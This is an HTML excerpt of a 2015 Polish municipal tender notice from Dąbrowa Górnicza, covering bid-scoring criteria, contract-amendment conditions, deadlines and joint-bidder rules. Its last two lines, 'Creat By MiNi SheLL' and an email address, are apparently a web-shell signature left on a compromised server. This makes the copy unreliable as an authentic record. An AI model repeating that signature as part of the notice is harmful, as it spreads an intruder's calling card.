<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 95</li>
<li>2 - Termin realizacji - 5</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>I.. Zamawiający przewiduje  możliwość dokonania istotnych zmian  postanowień zawartej umowy                    w  stosunku do treści oferty, na podstawie której  dokonano wyboru Wykonawcy, w zakresie:
1. zmiany terminu wykonania zamówienia  w następujących przypadkach:
1.1. wystąpienie siły wyższej. Siła wyższa oznacza wydarzenie  nieprzewidywalne i poza kontrolą stron umowy, występujące po podpisaniu umowy, a powodujące niemożliwość wywiązania się z umowy w jej obecnym brzmieniu;
1.2. konieczność wykonania zamówień dodatkowych, o których mowa w art.67 ust.1 pkt 5 Ustawy, których wykonanie jest niezbędne dla prawidłowego wykonania  oraz zakończenia podstawowego przedmiotu zamówienia wraz ze wszystkimi konsekwencjami występującymi w związku z przedłużeniem tego terminu;
1.3. zmiany przepisów prawa w trakcie realizacji zamówienia, powodujących konieczność dostosowania dokumentacji;
1.4. braku prawa do dysponowania terenem;
1.5. niezawinionych przez Wykonawcę opóźnień w uzyskaniu wymaganych pozwoleń, uzgodnień, decyzji lub opinii  organów, niezbędnych do uzyskania pozwolenia na budowę;
1.6. aktualizacji  rozwiązań projektowych z uwagi na postęp technologiczny bądź  zmiany obowiązujących przepisów;
1.7. przesunięcia terminu realizacji robót budowlanych wykonywanych w oparciu o dokumentację projektową będą przedmiotem zamówienia;
2. w pozostałym zakresie zmiany do umowy mogą dotyczyć następujących okoliczności:
2.1. zmiany stawki podatku VAT:
2.1.1. w przypadku zwiększenia stawki podatku VAT- ceny jednostkowe netto nie mogą być wyższe niż zadeklarowane w formularzu ofertowym. Wartość wynagrodzenia brutto nie ulegnie zmianie 
w okresie obowiązywania umowy,
2.1.2.  w przypadku zmniejszenia stawki podatku VAT -ceny jednostkowe netto nie mogą być wyższe niż zadeklarowane w formularzu ofertowym. Wartość wynagrodzenia brutto zostanie pomniejszona 
z odpowiednim zastosowaniem zmniejszonej stawki podatku VAT.
2.2.  zmiany wysokości wynagrodzenia należnego wykonawcy w odniesieniu do nadzoru autorskiego - w przypadku zmiany:
a) wysokości minimalnego wynagrodzenia za pracę ustalonego na podstawie art. 2 ust. 3-5 ustawy z dnia 10 października 2002 r. o minimalnym wynagrodzeniu za pracę,
b) zasad podlegania ubezpieczeniom społecznym lub ubezpieczeniu zdrowotnemu lub wysokości stawki składki na ubezpieczenie społeczne lub zdrowotne  
- jeżeli zmiany te będą miały wpływa na koszty wykonania zamówienia przez Wykonawcę, każda ze stron w celu dokonania zmiany wynagrodzenia może wystąpić z takim żądaniem do drugiej strony Umowy. Zmiana umowy może nastąpić po upływie 12 miesięcy od daty podpisania umowy.  
II.W przypadku wystąpienia okoliczności skutkujących koniecznością zmiany umowy z przyczyn,                     o których mowa w pkt. 25.4 SIWZ Wykonawca zobowiązany jest do   niezwłocznego poinformowania o tym fakcie Zamawiającego i wystąpienia z wnioskiem o dokonanie wskazanej zmiany.   
III. Z okoliczności stanowiących podstawę zmiany do umowy zostanie sporządzony protokół podpisany przez obie strony.
IV. Zmiana umowy powinna nastąpić w formie pisemnego aneksu podpisanego przez obie  strony, pod rygorem nieważności takiego oświadczenia oraz powinna zawierać  uzasadnienie faktyczne i prawne.
V. Zmiana do umowy w sprawie zamówienia publicznego bez zachowania formy pisemnej jest      
dotknięta sankcją nieważności, a więc nie wywołuje skutków prawnych.
VI. Pozostałe kwestie odnoszące się do umowy uregulowane są w załączniku nr 7 do SIWZ -  projekt umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.dabrowa-gornicza.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Dąbrowie Górniczej,                           ul. Graniczna 21, Wydział Inwestycji Miejskich, II piętro, pokój nr 222..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 09.06.2015 godzina 09:30, miejsce: Urząd  Miejski w Dąbrowie Górniczej,
ul. Graniczna 21, parter, stanowisko nr 13 - INFORMACJA.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> I. Zamówienie nie jest finansowane ze środków Unii Europejskiej.
II. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia.
1. Wykonawcy wspólnie ubiegający się o udzielenie niniejszego zamówienia powinni spełniać warunki udziału w postępowaniu określone w punkcie 8 SIWZ oraz złożyć dokumenty i oświadczenia potwierdzające spełnianie tych warunków zgodnie z zapisami zawartymi w punkcie 9 SIWZ.
2. W przypadku wspólnego ubiegania się o udzielenie niniejszego zamówienia przez dwóch  lub więcej Wykonawców, w ofercie muszą być złożone dokumenty i oświadczenia wymienione w pkt   9.2. SIWZ przez każdego z nich lub przez pełnomocnika w imieniu każdego z nich. Dokument wymieniony w  pkt. 9.3.  SIWZ  każdy z Wykonawców składa oddzielnie. 
3.Dokumenty i oświadczenia wymienione w  pkt. 9.1.2 i 9.1.3 SIWZ Wykonawcy składają wspólnie.
Oświadczenie wymienione w pkt. 9.1.1. SIWZ, formularz ofertowy wymieniony w pkt. 9.4.1. SIWZ winny być podpisane przez uprawnionych przedstawicieli Wykonawców. Oświadczenia na podstawie art. 22 ust. 1 Ustawy (załącznik nr 2 do SIWZ) składają  wszyscy wykonawcy wspólnie na jednym druku lub pełnomocnik.
4.Ponadto ww. Wykonawcy ustanawiają Pełnomocnika do reprezentowania ich w niniejszym postępowaniu albo reprezentowania ich w postępowania i zawarcia umowy w sprawie zamówienia publicznego. 
5. Wszelka korespondencja prowadzona będzie wyłącznie z  Pełnomocnikiem.
III. Zamawiający nie wymaga wniesienia zabezpieczenia należytego wykonania umowy.
IV. Uszczegółowienie sekcji II.2) ogłoszenia: Czas trwania zamówienia lub termin wykonania: Termin rozpoczęcia realizacji zadania - od dnia podpisania umowy.
Termin zakończenia realizacji zadania -  nie dłużej nić 8 miesięcy od dnia podpisania umowy - na wykonanie dokumentacji projektowej oraz uzyskanie zezwolenia na realizację inwestycji drogowej.
Termin obowiązywania umowy: do 2 lat od dnia zawarcia umowy.
            Termin realizacji zadania stanowi kryterium oceny ofert.
V. Uszczegółowienie sekcji IV.2.1.) ogłoszenia: Kryteria oceny ofert: a) cena oferty - 95% b)  Termin realizacji - 5%
W  ramach kryterium termin realizacji ocena będzie ona dokonywana na podstawie deklaracji zawartej 
w pkt. 5 Formularza ofertowego (zał. nr 1 do SIWZ).

Wykonawca może zadeklarować termin zakończenia realizacji zadania:
1)	8 miesięcy
2)	7 miesięcy
3)	6 miesięcy
Punkty za termin wykonania (T) będą przyznawane wg poniższych kryteriów:
1)	8 miesięcy - 0 punktów
2)	7 miesięcy - 50 punktów
3)	6 miesięcy- 100 punktów 
W przypadku uzyskania przez dwie lub więcej ofert jednakowej ilości punktów wygrywa oferta o najniższej spośród nich cenie..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com